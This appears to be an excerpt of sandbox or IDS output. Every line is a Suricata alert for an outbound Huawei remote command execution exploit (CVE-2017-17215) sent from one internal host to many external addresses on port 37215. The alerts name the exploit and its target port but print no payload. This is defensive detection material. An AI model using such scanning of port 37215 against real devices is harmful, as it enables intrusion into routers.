              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60824 -> 156.111.173.244:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42630 -> 197.197.233.195:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41530 -> 156.142.125.195:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54660 -> 197.189.179.202:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36126 -> 197.253.39.154:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55228 -> 197.226.31.129:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41846 -> 197.211.179.46:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36966 -> 197.201.37.79:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49128 -> 197.245.117.39:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59130 -> 156.190.223.108:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38612 -> 156.123.103.63:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46782 -> 156.13.246.131:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56642 -> 197.124.97.34:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54324 -> 197.110.175.164:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37096 -> 197.108.44.156:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59348 -> 197.218.151.99:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35806 -> 197.6.35.167:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60616 -> 197.22.83.77:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60756 -> 156.197.35.247:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52608 -> 156.168.251.194:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45796 -> 156.199.178.50:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36602 -> 197.162.136.12:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50524 -> 156.226.207.43:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53802 -> 156.195.46.194:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60598 -> 197.163.194.110:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33212 -> 197.207.20.109:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50914 -> 156.30.65.29:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54922 -> 197.110.97.157:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57920 -> 197.90.15.109:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54714 -> 197.220.175.207:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39706 -> 156.147.64.245:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40706 -> 197.49.44.136:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36402 -> 197.246.122.116:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42198 -> 156.110.158.129:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35772 -> 197.160.142.34:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34502 -> 197.77.197.169:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58930 -> 156.83.171.250:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36422 -> 156.164.145.19:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45326 -> 197.173.66.66:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53556 -> 197.219.58.119:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42456 -> 197.99.232.202:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42850 -> 156.20.76.240:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60216 -> 197.247.204.254:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56372 -> 197.104.82.76:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34374 -> 197.243.37.15:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38224 -> 197.112.42.129:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43984 -> 197.75.91.78:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56866 -> 197.89.101.168:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37084 -> 156.126.255.233:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38428 -> 197.113.104.228:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33186 -> 156.75.252.251:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44882 -> 197.187.221.183:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41794 -> 156.50.161.124:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36926 -> 197.143.212.139:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44942 -> 156.156.183.68:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43462 -> 156.241.48.252:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55696 -> 197.52.211.50:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34234 -> 156.213.125.62:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39026 -> 156.126.240.250:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:32778 -> 197.10.243.107:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55230 -> 197.241.159.136:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43992 -> 156.241.151.37:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51930 -> 156.113.246.134:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48976 -> 156.243.217.8:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41260 -> 156.191.152.230:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57800 -> 197.242.55.89:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:32926 -> 197.90.153.26:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51778 -> 156.19.200.199:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55026 -> 156.110.142.46:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46132 -> 156.22.140.147:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35728 -> 156.199.175.163:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58840 -> 156.135.204.95:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36740 -> 156.128.155.210:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43250 -> 197.222.26.31:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47156 -> 197.88.143.189:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48860 -> 197.212.181.214:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55042 -> 156.244.99.102:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55452 -> 197.179.21.218:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39916 -> 156.209.146.115:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58784 -> 156.45.166.65:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50290 -> 197.140.64.76:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34498 -> 156.38.222.36:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33248 -> 197.27.6.99:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47448 -> 156.138.96.116:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48826 -> 156.166.219.236:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44176 -> 156.78.203.235:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54060 -> 156.155.209.97:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55346 -> 156.81.174.167:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44294 -> 197.201.117.92:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56280 -> 156.139.171.60:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59800 -> 156.137.250.26:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42016 -> 156.40.74.133:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58158 -> 156.184.170.13:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60302 -> 156.150.54.199:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40248 -> 156.111.169.84:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58380 -> 197.6.14.151:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45772 -> 156.55.28.102:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43434 -> 197.48.227.65:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55858 -> 197.159.73.150:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58038 -> 197.212.235.240:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54464 -> 197.53.57.221:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59910 -> 156.204.42.106:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43212 -> 197.38.155.175:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45070 -> 197.120.175.232:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41102 -> 156.79.72.232:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40172 -> 156.204.161.203:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47454 -> 156.36.224.73:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33372 -> 156.169.127.150:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58650 -> 197.62.241.250:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33370 -> 156.44.50.138:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46484 -> 197.11.5.82:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34664 -> 156.239.68.132:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36684 -> 156.184.54.238:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55934 -> 156.200.147.255:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55340 -> 197.121.104.207:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34274 -> 156.8.188.105:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38526 -> 156.254.147.72:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59258 -> 156.89.173.50:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48138 -> 156.156.19.106:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34194 -> 156.97.142.170:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53744 -> 156.68.214.167:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33362 -> 197.17.198.41:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59324 -> 156.5.127.90:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53712 -> 197.120.162.227:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36016 -> 156.115.254.160:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52018 -> 156.127.194.55:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46002 -> 156.69.250.83:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45372 -> 197.9.132.192:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33844 -> 156.41.240.115:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55860 -> 156.204.247.200:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51414 -> 156.21.26.40:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36026 -> 156.108.12.98:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46808 -> 156.206.126.158:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58158 -> 156.133.222.12:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52214 -> 156.168.189.86:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42714 -> 156.121.132.215:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41012 -> 197.170.153.128:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60068 -> 156.32.227.132:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54064 -> 156.240.110.227:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48842 -> 197.107.133.13:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56332 -> 197.248.255.184:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57384 -> 156.64.187.113:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51002 -> 156.20.16.63:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42594 -> 197.144.148.122:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35706 -> 156.131.75.246:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48580 -> 156.113.1.251:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38574 -> 197.55.166.150:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54958 -> 197.2.231.60:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42252 -> 197.86.111.179:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49440 -> 197.171.113.120:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35860 -> 197.113.159.174:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55116 -> 156.119.203.246:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40660 -> 156.172.127.204:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47192 -> 197.143.237.85:37215
